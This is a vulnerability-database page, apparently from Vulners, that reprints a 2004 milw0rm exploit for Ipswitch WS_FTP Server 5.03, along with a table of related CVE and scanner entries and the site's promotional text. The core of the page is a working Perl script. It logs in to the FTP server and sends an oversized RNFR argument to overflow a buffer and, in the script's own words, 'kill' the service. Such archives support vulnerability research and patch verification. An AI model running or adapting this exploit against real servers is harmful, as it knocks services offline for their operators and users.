Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| WS_FTP < 2.0.3 Multiple Command Long Argument Overflows | 20 Aug 200400:00 | – | nessus | |
| WS_FTP Multiple Command Long Argument Overflow | 21 Aug 200200:00 | – | nessus | |
| CVE-2001-1021 | 2 Feb 200205:00 | – | cve | |
| CVE-2001-1021 | 2 Feb 200205:00 | – | cvelist | |
| Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflows | 25 Jul 200100:00 | – | exploitdb | |
| CVE-2001-1021 | 26 Jul 200104:00 | – | nvd | |
| WS_FTP Server Buffer Overflow Vulnerability (Nov 2005) | 3 Nov 200500:00 | – | openvas | |
| PT-2001-2170 · Ipswitch · Ws Ftp | 26 Jul 200100:00 | – | ptsecurity |
#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>
# WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
######################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";
sleep(1);
print $socket "USER $ARGV[1]\r\n";
sleep(1);
print $socket "PASS $ARGV[2]\r\n";
sleep(1);
print $socket "PORT 127,0,0,1,18,12\r\n";
sleep(1);
print $socket "RNFR " . "A" x 768 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== End WS_FTP_Overflow.pl =====
# milw0rm.com [2004-11-29]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.42141